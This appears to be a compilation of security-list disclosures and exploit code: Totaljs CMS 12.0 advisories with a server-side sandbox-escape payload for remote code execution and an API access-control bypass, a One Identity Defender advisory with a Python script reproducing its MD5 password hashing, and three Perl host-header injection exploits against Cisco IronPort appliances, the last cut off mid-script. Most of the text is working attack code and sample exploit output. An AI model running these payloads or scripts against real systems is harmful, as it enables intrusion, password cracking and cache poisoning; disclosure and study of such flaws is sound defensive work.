[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Authenticated Code injection on widget creation.

[+] Affected software: Totaljs CMS 12.0

[+] Description:

An authenticated user with “widgets” privilege can gain RCE on the 
remote server by creating a malicious widget with a special tag 
containing java-script code that will be evaluated server side.
In the process of evaluating the tag by back-end is possible to escape 
the sandbox object by using the following payload:
<script 
total>global.process.mainModule.require(‘child_process’).exec(‘RCE 
here’);</script>

[+] Step to reproduce:

1) browse to http://localhost:8000/admin/widgets/
2) click on create
3) paste the payload in the source code filed
4) click on save

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details: 
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many ping here

- 18/06/2019 -> pinged the vendor last time

- 30/08/2019 -> reported to seclist

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Broken Access Control on the API call

[+] Affected software: Totaljs CMS 12.0

[+] Description: An authenticated user with limited privileges can get 
access to resource that did not own by calling the associated API.
The CMS manage correctly the privilege only for the front-end resource 
path, but it does not the same for the API request. This lead to 
vertical and horizontal privilege escalation.

[+] Step to reproduce:

1) create a user with any privileges (e.g. “Notices”).
2) log in with this user and browse to http://localhost:8000/admin/notices/
3) copy the __admin cookie that by default identify the session user
4) create a POST request in burp to the following path 
/admin/api/pages/preview/ with body {"body":"","template":"default"}
5) you will get a 200 response back that means we can successfully used 
an API call that we don’t have the privilege to use.

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details: 
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many ping here

- 18/06/2019 -> pinged the vendor last time

- 30/08/2019 -> reported to seclist

Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
==============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName                    ObjectGUID                           defender-userTokenData
-----------------                    ----------                           ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
import binascii
import hashlib

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'

guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))

password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()

hash = binascii.unhexlify(key) + password + guid

print (hashlib.md5(hash).hexdigest())

[duras@qonos ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5

Contact:
========
spicyitalian[at]protonmail[dot]com

#!/usr/bin/perl -w
#
#
#  Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       [test@localhost ironport]$ perl ironport_m600v.pl https://192.168.1.1
#  # Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
#  # =================================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => iCab/4.0 (Macintosh; U; Intel Mac OS X)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Wed, 04 Sep 2019 09:09:09 GMT
#  # <  Pragma => no-cache
#  # <  Location => https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Wed, 04 Sep 2019 09:09:09 GMT
#  # <  Last-Modified => Wed, 04 Sep 2019 09:09:09 GMT
#  # <  Client-Date => Wed, 04 Sep 2019 09:09:09 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Set-Cookie => sid=xPLafDYAZCboH6s0rHzX; expires=Friday, 06-Sep-2019 09:09:09 GMT; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # =================================================================================================
#  # IronPort is Poisoned => https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#       [test@localhost ironport]$ 
#
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
# =================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# =================================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       [test@localhost ironport]$ perl ironport_c300v.pl https://192.168.1.1
#  # Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
#  # ====================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => Mozilla/5.0 (compatible; Konqueror/4.1; Linux 2.6.27.7-134.fc10.x86_64; X11; x86_64) KHTML/4.1.3 (like Gecko) Fedora/4.1.3-4.fc10
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Wed, 04 Sep 2019 09:38:42 GMT
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html; charset=UTF-8
#  # <  Expires => Wed, 04 Sep 2019 09:38:42 GMT
#  # <  Last-Modified => Wed, 04 Sep 2019 09:38:42 GMT
#  # <  Client-Date => Wed, 04 Sep 2019 09:38:43 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject =>
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Link => <https://scam-page.com/scfw/1y-11.1.1-042/yui/container/assets/container.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/button/assets/skins/sam/button.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/menu/assets/menu.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/tabview/assets/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/tabview/assets/border_tabs.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/datatable/assets/datatable.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/datatable/assets/datatable-core.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/assets/skins/sam/editor.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/calendar/assets/calendar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/assets/skins/sam/progressbar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/skins/IP/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/images/ironport_favicon.ico>; rel="icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.1.1-042/images/ironport_favicon.ico>; rel="shortcut icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.1.1-042/yui/paginator/assets/skins/sam/paginator.css>; rel="stylesheet"; type="text/css"
#  # <  Set-Cookie => sid=WggkxsWtZGlAgvFwMWKT; httponly; Path=/; secure
#  # <  Title => Cisco Email Security Virtual Appliance C300V (scam-page.com) - Access Denied
#  # <  X-Frame-Options => SAMEORIGIN
#  # ====================================================================================
#  # IronPort is Poisoned! Exploitation successfully
#  # [test@localhost ironport]$
#
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ====================================================================================\n";
if (defined ($response->content) and ($response->content =~ m/$attacker/)){
  print "# IronPort is Poisoned! Exploitation successfully\n";
  exit;

} else {

  print "# Exploitation failed!!!\n";
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       [test@localhost ironport]$ perl ironport_c380.pl https://192.168.1.1
#  # Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
#  # ===================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Wed, 04 Sep 2019 11:31:23 GMT
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html; charset=UTF-8
#  # <  Expires => Wed, 04 Sep 2019 11:31:23 GMT
#  # <  Last-Modified => Wed, 04 Sep 2019 11:31:23 GMT
#  # <  Client-Date => Wed, 04 Sep 2019 11:31:24 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Link => <https://scam-page.com/scfw/1y-11.0.1-027/yui/container/assets/container.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/button/assets/skins/sam/button.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/menu/assets/menu.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/tabview/assets/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/tabview/assets/border_tabs.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/datatable/assets/datatable.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/datatable/assets/datatable-core.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/assets/skins/sam/editor.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/calendar/assets/calendar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/assets/skins/sam/progressbar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/skins/IP/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/images/ironport_favicon.ico>; rel="icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.0.1-027/images/ironport_favicon.ico>; rel="shortcut icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.0.1-027/yui/paginator/assets/skins/sam/paginator.css>; rel="stylesheet"; type="text/css"
#  # <  Set-Cookie => sid=DxXpWgmfYKcWGpQBQNTp; httponly; Path=/; secure
#  # <  Title => Cisco Email Security Appliance C380 (scam-page.com) - Access Denied
#  # <  X-Frame-Options => SAMEORIGIN
#  # ===================================================================================
#  # IronPort is Poisoned! Exploitation successfully
#       [test@localhost ironport]$
#
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
# ===================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
